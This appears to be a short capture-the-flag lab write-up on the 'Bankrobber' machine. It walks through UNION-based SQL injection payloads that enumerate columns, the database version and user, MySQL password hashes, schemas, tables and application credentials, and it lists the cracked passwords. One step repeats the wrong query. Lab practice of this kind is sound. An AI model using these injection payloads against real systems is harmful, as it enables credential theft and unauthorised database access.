InfoSec LAB

Bankrobber_SQLi

Created: 2 min read

SQLi

SQLi is confirmed to be present at one of the sections of the admin panel

I will get straight to enumeration

Detecting the number of columns in the query

' UNION SELECT 1,1,1# There are a total of 3 columns within this query The 3rd query isn’t displayed. That being said, I can only display 2 sets of information at a time.

Version

' UNION SELECT database(),version(),1# The current DB is bankrobber, and the DB server is MariaDB 10.1.38

Current User

' UNION SELECT user(),system_user(),1# The currently authenticated user is root@localhost It has the highest privileges since it is the root user

DB Credential

' UNION SELECT user,password,1 FROM mysql.user# The command list all the users and their password hashes. I see the password hash for the root user It’s F435725A173757E57BD36B09048B8B610FF4D0C4

Password Cracking

Although Hachcat was unable to crack the password hash, Crackstation did it The password is Welkom1!

I can stop at this point, but I will continue for sport and practice

Enumerating Databases

' UNION SELECT GROUP_CONCAT(schema_name), NULL, NULL FROM information_schema.schemata# There are a total of 6 DBs within the MariaDB server 3 of them aren’t part of the default installation

  • bankrobber
  • phpmyadmin
  • test

bankrobber

' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='bankrobber'# There are 3 tables within the bankrobber DB

  • balance
  • hold
  • users

I am not interested in balance or hold as they would only contains data from the transfer feature. I will take a look at the bankrobber.users table

' UNION SELECT GROUP_CONCAT(column_name), NULL, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema='bankrobber'# bankrobber.users contains 3 columns of data

  • id
  • username
  • password

' UNION SELECT GROUP_CONCAT(column_name), NULL, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema='bankrobber'# Displaying the content of bankrobber.users.username and bankrobber.users.passwordadmin:Hopelessromantic (already found) • gio:gio (new) • test:test123 (testing account) A new credential is found; gio:gio

Although these are credentials to the web application, I can still try for credential reuse Moving onto the next DB

phpmyadmin

' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='phpmyadmin'# Tables so many that it broke the website layout Yet none of them seem to be containing any credential

test

' UNION SELECT GROUP_CONCAT(table_name), NULL, NULL FROM information_schema.tables WHERE table_schema='test'# The test DB is empty

Interactive Graph View

Backlinks